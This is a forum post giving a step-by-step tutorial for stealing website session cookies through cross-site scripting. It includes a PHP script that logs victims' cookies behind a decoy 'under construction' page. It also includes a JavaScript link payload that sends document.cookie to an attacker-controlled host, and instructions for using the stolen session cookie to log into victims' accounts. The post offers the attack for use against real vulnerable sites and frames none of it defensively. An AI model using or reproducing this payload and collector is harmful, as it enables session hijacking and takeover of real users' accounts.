In order for a cookie stealer to work, you must find a vulnarable website, that you can post java script into. the code in previous post looks a little wrong. Here is the proper method of doing this.
Things you need
......................
1. firefox
2. firebug addon for firefox
3. firecookie addon for fire fox
4. Free webhosting account
So.... once you have the above programs/addons installed and your free hosting account please proceed...
Create a new text document and insert this code
Code: Select all
<?php
$cookie=$HTTP_GET_VARS["cookie"];
$data=date("I ds of F Y h:i:s A");
$user_agent=$_SERVER['HTTP_USER_AGENT'];
$file=fopen('cookies.txt','a');
fwrite($file,"DATE :$data || USER AGENT:$user_agent || cookie:$cookie\n");
fclose($file);
echo '<b> sorry this page is under construction</b></ br>
</ br>Please click <a href="http://www.redirecttoanywebsite.com/">here</a> to go back to previous menu'
?>
Now i am not going to give you any websites that are vulnarable, find them for yourself ;p
assuming you have one, you will enter this code,
Code: Select all
<a onclick="document.location='http://yourfreehostingaccountdomain.com/index?cookie='+escape(document.cookie);" href="#">click here</a>
Than open firefox, goto your posted java script..... Open options and clear all cookies, open the firebug icon top right of firefox and click cookie. replace sid cookie with the cookie you have stolen.... and now you have logged in with there account
Any Questions please ask
Geordie_Mafia